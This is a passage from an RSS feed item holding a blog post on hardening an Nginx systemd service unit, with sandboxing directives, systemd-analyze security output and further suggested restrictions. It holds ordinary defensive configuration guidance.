&lt;span class="c"&gt;# write logs to /var/log/nginx
&lt;/span&gt;&lt;span class="py"&gt;LogsDirectory&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx&lt;/span&gt;
&lt;span class="c"&gt;# write cache to /var/cache/nginx
&lt;/span&gt;&lt;span class="py"&gt;CacheDirectory&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx&lt;/span&gt;
&lt;span class="c"&gt;# configuration is in /etc/nginx
&lt;/span&gt;&lt;span class="py"&gt;ConfigurationDirectory&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx&lt;/span&gt;

&lt;span class="py"&gt;ExecStart&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/usr/sbin/nginx -c /etc/nginx/nginx.conf&lt;/span&gt;
&lt;span class="c"&gt;# PIDFile= is not necessary here as the service is not forking
&lt;/span&gt;&lt;span class="py"&gt;ExecReload&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/usr/sbin/nginx -s reload&lt;/span&gt;

&lt;span class="py"&gt;Restart&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;on-failure&lt;/span&gt;
&lt;span class="py"&gt;RestartSec&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;10s&lt;/span&gt;

&lt;span class="c"&gt;# Hardening
# hide the entire filesystem tree from the service and also make it read only, requires systemd &amp;gt;=238
&lt;/span&gt;&lt;span class="py"&gt;TemporaryFileSystem&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/:ro&lt;/span&gt;
&lt;span class="c"&gt;# Remount (bind) necessary paths, based on https://gitlab.com/apparmor/apparmor/blob/master/profiles/apparmor.d/abstractions/base,
# https://github.com/jelly/apparmor-profiles/blob/master/usr.bin.nginx,
# https://www.freedesktop.org/software/systemd/man/systemd.exec.html#RootDirectory=
#
# This gives access to (probably) necessary system files, allows journald logging
&lt;/span&gt;&lt;span class="py"&gt;BindReadOnlyPaths&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/lib/ /lib64/ /usr/lib/ /usr/lib64/ /etc/ld.so.cache /etc/ld.so.conf /etc/ld.so.conf.d/ /etc/bindresvport.blacklist /usr/share/zoneinfo/ /usr/share/locale/ /etc/localtime /usr/share/common-licenses/ /etc/ssl/certs/ /etc/resolv.conf&lt;/span&gt;
&lt;span class="py"&gt;BindReadOnlyPaths&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/dev/log /run/systemd/journal/socket /run/systemd/journal/stdout /run/systemd/notify&lt;/span&gt;
&lt;span class="c"&gt;# Additional access to service-specific directories
&lt;/span&gt;&lt;span class="py"&gt;BindReadOnlyPaths&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/usr/sbin/nginx&lt;/span&gt;
&lt;span class="py"&gt;BindReadOnlyPaths&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/run/ /usr/share/nginx/&lt;/span&gt;

&lt;span class="py"&gt;PrivateTmp&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;PrivateDevices&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;ProtectControlGroups&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;ProtectKernelModules&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;ProtectKernelTunables&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;

&lt;span class="c"&gt;# Network access
&lt;/span&gt;&lt;span class="py"&gt;RestrictAddressFamilies&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;AF_UNIX AF_INET AF_INET6&lt;/span&gt;

&lt;span class="c"&gt;# Miscellaneous
&lt;/span&gt;&lt;span class="py"&gt;SystemCallArchitectures&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;native&lt;/span&gt;
&lt;span class="c"&gt;# also implicit because settings like MemoryDenyWriteExecute are set
&lt;/span&gt;&lt;span class="py"&gt;NoNewPrivileges&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;MemoryDenyWriteExecute&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;ProtectKernelLogs&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;LockPersonality&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;ProtectHostname&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;RemoveIPC&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;RestrictSUIDSGID&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;ProtectClock&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;

&lt;span class="c"&gt;# Capabilities to bind low ports (80, 443)
&lt;/span&gt;&lt;span class="py"&gt;AmbientCapabilities&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;CAP_NET_BIND_SERVICE&lt;/span&gt;

&lt;span class="nn"&gt;[Install]&lt;/span&gt;
&lt;span class="py"&gt;WantedBy&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;multi-user.target&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now the service not only runs as non-root, but the process and its sub-processes also have access to only a very limited part of the system. The filesystem is hidden by default, and only the necessary system directories are either bound in read-only or substituted by temporary paths. Besides that, data can only be persisted where necessary, which further limits the attack surface. Running &lt;code&gt;systemd-analyze&lt;/code&gt; again on the new service shows the effect:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;david@proxy:~$ systemd-analyze security nginx.service --no-pager&lt;/code&gt;&lt;br&gt;

  Nginx Service Security Summary
  &lt;br&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;  NAME                                                        DESCRIPTION                                                       EXPOSURE
✗ PrivateNetwork=                                             Service has access to the host's network                               0.5
✓ User=/DynamicUser=                                          Service runs under a static non-root user identity
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP)                Service may change UID/GID identities/capabilities                     0.3
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN                        Service has administrator privileges                                   0.3
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE                       Service has ptrace() debugging abilities                               0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6)                    Service may allocate Internet sockets                                  0.3
✗ RestrictNamespaces=~CLONE_NEWUSER                           Service may create user namespaces                                     0.3
✓ RestrictAddressFamilies=~…                                  Service cannot allocate exotic sockets
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP)           Service may change file ownership/access mode/capabilities unres…      0.2
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER)         Service may override UNIX file/IPC permission checks                   0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN                        Service has network configuration privileges                           0.2
✓ CapabilityBoundingSet=~CAP_RAWIO                            Service has no raw I/O access
✓ CapabilityBoundingSet=~CAP_SYS_MODULE                       Service cannot load kernel modules
✓ CapabilityBoundingSet=~CAP_SYS_TIME                         Service processes cannot change the system clock
✗ DeviceAllow=                                                Service has a device ACL with some special devices                     0.1
✗ IPAddressDeny=                                              Service does not define an IP address whitelist                        0.2
✓ KeyringMode=                                                Service doesn't share key material with other services
✓ NoNewPrivileges=                                            Service processes cannot acquire new privileges
✓ NotifyAccess=                                               Service child processes cannot alter service state
✓ PrivateDevices=                                             Service has no access to hardware devices
✓ PrivateMounts=                                              Service cannot install system mounts
✓ PrivateTmp=                                                 Service has no access to other software's temporary files
✗ PrivateUsers=                                               Service has access to other users                                      0.2
✗ ProtectClock=                                               Service may write to the hardware clock or system clock                0.2
✓ ProtectControlGroups=                                       Service cannot modify the control group file system
✗ ProtectHome=                                                Service has full access to home directories                            0.2
✓ ProtectKernelLogs=                                          Service cannot read from or write to the kernel log ring buffer
✓ ProtectKernelModules=                                       Service cannot load or read kernel modules
✓ ProtectKernelTunables=                                      Service cannot alter kernel tunables (/proc/sys, …)
✗ ProtectSystem=                                              Service has full access to the OS file hierarchy                       0.2
✓ RestrictAddressFamilies=~AF_PACKET                          Service cannot allocate packet sockets
✓ RestrictSUIDSGID=                                           SUID/SGID file creation by service is restricted
✓ SystemCallArchitectures=                                    Service may execute system calls only with native ABI
✗ SystemCallFilter=~@clock                                    Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@debug                                    Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@module                                   Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@mount                                    Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@raw-io                                   Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@reboot                                   Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@swap                                     Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@privileged                               Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@resources                                Service does not filter system calls                                   0.2
✗ AmbientCapabilities=                                        Service process receives ambient capabilities                          0.1
✗ CapabilityBoundingSet=~CAP_AUDIT_*                          Service has audit subsystem access                                     0.1
✗ CapabilityBoundingSet=~CAP_KILL                             Service may send UNIX signals to arbitrary processes                   0.1
✓ CapabilityBoundingSet=~CAP_MKNOD                            Service cannot create device nodes
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges                             0.1
✓ CapabilityBoundingSet=~CAP_SYSLOG                           Service has no access to kernel logging
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE)              Service has privileges to change resource use parameters               0.1
✗ RestrictNamespaces=~CLONE_NEWCGROUP                         Service may create cgroup namespaces                                   0.1
✗ RestrictNamespaces=~CLONE_NEWIPC                            Service may create IPC namespaces                                      0.1
✗ RestrictNamespaces=~CLONE_NEWNET                            Service may create network namespaces                                  0.1
✗ RestrictNamespaces=~CLONE_NEWNS                             Service may create file system namespaces                              0.1
✗ RestrictNamespaces=~CLONE_NEWPID                            Service may create process namespaces                                  0.1
✗ RestrictRealtime=                                           Service may acquire realtime scheduling                                0.1
✗ SystemCallFilter=~@cpu-emulation                            Service does not filter system calls                                   0.1
✗ SystemCallFilter=~@obsolete                                 Service does not filter system calls                                   0.1
✓ RestrictAddressFamilies=~AF_NETLINK                         Service cannot allocate netlink sockets
✗ RootDirectory=/RootImage=                                   Service runs within the host's root directory                          0.1
✓ SupplementaryGroups=                                        Service has no supplementary groups
✗ CapabilityBoundingSet=~CAP_MAC_*                            Service may adjust SMACK MAC                                           0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT                         Service may issue reboot()                                             0.1
✓ Delegate=                                                   Service does not maintain its own delegated control group subtree
✓ LockPersonality=                                            Service cannot change ABI personality
✓ MemoryDenyWriteExecute=                                     Service cannot create writable executable memory mappings
✓ RemoveIPC=                                                  Service user cannot leave SysV IPC objects around
✗ RestrictNamespaces=~CLONE_NEWUTS                            Service may create hostname namespaces                                 0.1
✗ UMask=                                                      Files created by service are world-readable by default                 0.1
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE                  Service may mark files immutable                                       0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK                         Service may lock memory into RAM                                       0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT                       Service may issue chroot()                                             0.1
✓ ProtectHostname=                                            Service cannot change system host/domainname
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND                    Service may establish wake locks                                       0.1
✗ CapabilityBoundingSet=~CAP_LEASE                            Service may create file leases                                         0.1
✗ CapabilityBoundingSet=~CAP_SYS_PACCT                        Service may use acct()                                                 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG                   Service may issue vhangup()                                            0.1
✓ CapabilityBoundingSet=~CAP_WAKE_ALARM                       Service cannot program timers that wake up the system
✗ RestrictAddressFamilies=~AF_UNIX                            Service may allocate local sockets                                     0.1

→ Overall exposure level for nginx.service: 6.1 MEDIUM 😐
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;




&lt;/p&gt;

&lt;p&gt;The exposure level dropped from 9.6 (UNSAFE) to 6.1 (MEDIUM). There is still room for improvement, but many potential attack vectors have been mitigated compared to the officially provided unit file.&lt;/p&gt;
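
&lt;p&gt;Several of the remaining ✗ entries correspond to directives that the unit above does not set yet. The following additions are only a sketch: they have not been tested against this Nginx setup, and each one should be checked by restarting the service and watching its logs, as overly strict settings can stop Nginx from starting:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;[Service]
# Limit the bounding set to the single capability granted via AmbientCapabilities=
CapabilityBoundingSet=CAP_NET_BIND_SERVICE
# Deny the creation of any new namespaces
RestrictNamespaces=true
# Deny realtime scheduling
RestrictRealtime=true
# Make /home, /root and /run/user inaccessible
ProtectHome=true
# Mount the OS file hierarchy read-only; RuntimeDirectory=, LogsDirectory=
# and CacheDirectory= remain writable
ProtectSystem=strict
# Allow only the system calls in the @system-service group
SystemCallFilter=@system-service
# Return EPERM instead of killing the process when a filtered call is made
SystemCallErrorNumber=EPERM
# Create files without access for group and others (may need loosening if
# other users have to read the logs)
UMask=0077
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Adding the directives one at a time and re-running &lt;code&gt;systemd-analyze security nginx.service&lt;/code&gt; after each change makes it easier to tell which setting breaks the service, should one do so.&lt;/p&gt;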

&lt;h2&gt;
  
  
  🚀 Where to Continue
&lt;/h2&gt;

&lt;p&gt;In summary, Systemd offers a straightforward way to constrain a process's capabilities, primarily by leveraging Linux namespaces. This can significantly enhance security, but it has its limits. That is where Mandatory Access Control steps in: tools such as &lt;a href="https://ubuntu.com/server/docs/security-apparmor" rel="noopener noreferrer"&gt;AppArmor&lt;/a&gt; and &lt;a href="https://www.redhat.com/en/topics/linux/what-is-selinux" rel="noopener noreferrer"&gt;SELinux&lt;/a&gt; provide fine-grained control over system access, albeit with a more intricate configuration process. Numerous Linux distributions ship predefined profiles for a wide range of services, which simplifies adopting these controls.&lt;/p&gt;
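
&lt;p&gt;Systemd can also attach such a profile to a service directly. A minimal sketch, assuming an AppArmor profile for Nginx is already loaded on the host; the profile name &lt;code&gt;usr.sbin.nginx&lt;/code&gt; is a placeholder and not something this post defines:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;[Service]
# Switch the service's processes to the named AppArmor profile on start.
# The leading "-" tells systemd to ignore errors, e.g. when the profile is not loaded.
# "usr.sbin.nginx" is a hypothetical profile name.
AppArmorProfile=-usr.sbin.nginx
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;On SELinux systems, &lt;code&gt;SELinuxContext=&lt;/code&gt; plays a comparable role.&lt;/p&gt;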

&lt;p&gt;Ultimately, achieving a balance between security and practical implementation boils down to leveraging Systemd's capabilities alongside predefined Mandatory Access Control profiles. This approach strikes an effective compromise, ensuring both enhanced security and efficient deployment timelines.&lt;/p&gt;

</description>
      <category>systemd</category>
      <category>security</category>
      <category>linux</category>
      <category>kubernetes</category>
    </item>
  </channel>
</rss>
